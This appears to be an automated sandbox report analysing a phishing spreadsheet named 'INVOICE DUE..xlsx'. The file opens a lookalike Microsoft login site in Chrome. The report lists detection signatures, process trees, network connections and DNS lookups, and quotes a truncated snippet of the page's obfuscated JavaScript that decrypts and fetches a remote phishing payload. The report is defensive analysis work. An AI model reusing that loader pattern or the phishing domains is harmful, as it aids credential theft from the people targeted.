Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE DUE..xlsx

Overview

General Information

Sample name:INVOICE DUE..xlsx
Analysis ID:1522626
MD5:cad5db59ef5e257021d913e2db1257f7
SHA1:c9dbad90d7aaf722fa644ca72eaa850050d13389
SHA256:2922870b19e2d33fa378389c0f4bf185c15a3ce16eaf08889c5089fd914fabb6
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
HTML page contains suspicious javascript code
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • EXCEL.EXE (PID: 3016 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\INVOICE DUE..xlsx" MD5: 4A871771235598812032C822E6F68F19)
    • chrome.exe (PID: 4532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://office.microsoftviewer.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2056,i,7223425818943608362,9318162356086868873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • splwow64.exe (PID: 5208 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_102JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.42, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3016, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49780
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 49780, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3016, Protocol: tcp, SourceIp: 13.107.246.42, SourceIsIpv6: false, SourcePort: 443
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://office.microsoftviewer.com/LLM: Score: 8 Reasons: The brand 'Microsoft' is well-known and associated with the domain 'microsoft.com'., The URL 'office.microsoftviewer.com' contains 'microsoft' but is not a full match to 'microsoft.com'., The use of 'viewer' in the subdomain is suspicious and not a common practice for Microsoft., The input fields labeled 'u, n, k, n, o, w, n' are unusual and do not follow standard naming conventions for input fields. DOM: 0.0.pages.csv
    Source: Yara matchFile source: dropped/chromecache_102, type: DROPPED
    Source: https://office.microsoftviewer.com/HTTP Parser: window.location.href = atob(
    Source: https://office.microsoftviewer.com/HTTP Parser: Number of links: 0
    Source: https://office.microsoftviewer.com/HTTP Parser: Total embedded image size: 45687
    Source: https://office.microsoftviewer.com/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
    Source: https://office.microsoftviewer.com/HTTP Parser: Title: Continue your Log-in does not match URL
    Source: https://office.microsoftviewer.com/HTTP Parser: asyncfunction rabbi(earthquake) {var {a,b,c,d} =json.parse(earthquake);return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512,keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);} asyncfunction sack() { ibis.hidden=0;face.hidden =1;document.write(await rabbi(await(await fetch(await rabbi(atob(`eyjhijoiq1vnmuvzekpkvxdzdve4r2ftwujlrm1smhnnrmfquxblnzzpshrkyzjmcz0ilcjjijoioty3mdeznzuxndm2mwrjodzinzjmndg2mwu3zdljmwqilcjiijoindrmodrlztg4zgnlnzyzndy5ody4oti1ytgwztvhmwflzdrizdyxmtkyywm0ognhmdq1mzgznzi4odqwmmy4zwm2njm4zgzmnwrhyzq2otg1nwuxmdm1mdgzndy3yjzlmzgxm2yzywvjmjbiywvindu2njuxy2u3mjixngzjyjyymjgzm2u4zdnhyji2mdnhmjbhmwqwnmq5n2y2zmmxm2y3zwuznwjkmwmxyjgwyzuyndhmmjzkmwyzogiyn2qwzdy1ztrhogringyynge3ownjmdkwymu2owmzngzmy2qyzjjkodi1zju0nji5n2eynzzmowu4yte4mdy0nzblmtq0nmm0mmm1m2yzmtk0ymzmotqzytnin2qxnjfkyze0zdlmm2ywnde5otdmodg5ymiynjyzzjmzndi...
    Source: https://office.microsoftviewer.com/HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/?__cf_chl_tk=Yue3mkwHj7jK_QW1sgu_IsIN8EhPVsPZnnqD8d7weNk-1727695526-0.0.1.1-5332HTTP Parser: No favicon
    Source: https://office.microsoftviewer.com/HTTP Parser: No <meta name="author".. found
    Source: https://office.microsoftviewer.com/HTTP Parser: No <meta name="author".. found
    Source: https://office.microsoftviewer.com/HTTP Parser: No <meta name="copyright".. found
    Source: https://office.microsoftviewer.com/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.16:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.16:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49779 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49780 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49781 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49782 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49784 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49783 version: TLS 1.2
    Source: excel.exeMemory has grown: Private usage: 2MB later: 95MB
    Source: chrome.exeMemory has grown: Private usage: 1MB later: 31MB
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: global trafficDNS traffic detected: DNS query: office.microsoftviewer.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: pulseperpetuawe.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.16:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.16:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49779 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49780 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49781 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49782 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49784 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49783 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.winXLSX@21/16@32/184
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INVOICE DUE..xlsx
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{464F6E7A-90E1-4A02-8C7F-443C1C234D48} - OProcSessId.dat
    Source: INVOICE DUE..xlsxOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.ini
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\INVOICE DUE..xlsx"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://office.microsoftviewer.com/
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2056,i,7223425818943608362,9318162356086868873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://office.microsoftviewer.com/
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2056,i,7223425818943608362,9318162356086868873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: INVOICE DUE..xlsxInitial sample: OLE zip file path = xl/media/image1.png
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
    Source: INVOICE DUE..xlsxInitial sample: OLE indicators vbamacros = False

    Persistence and Installation Behavior

    barindex
    Source: Office documentLLM: Page contains button: 'View' Source: 'Office document'
    Source: Office documentLLM: Office document contains prominent button: 'view'
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
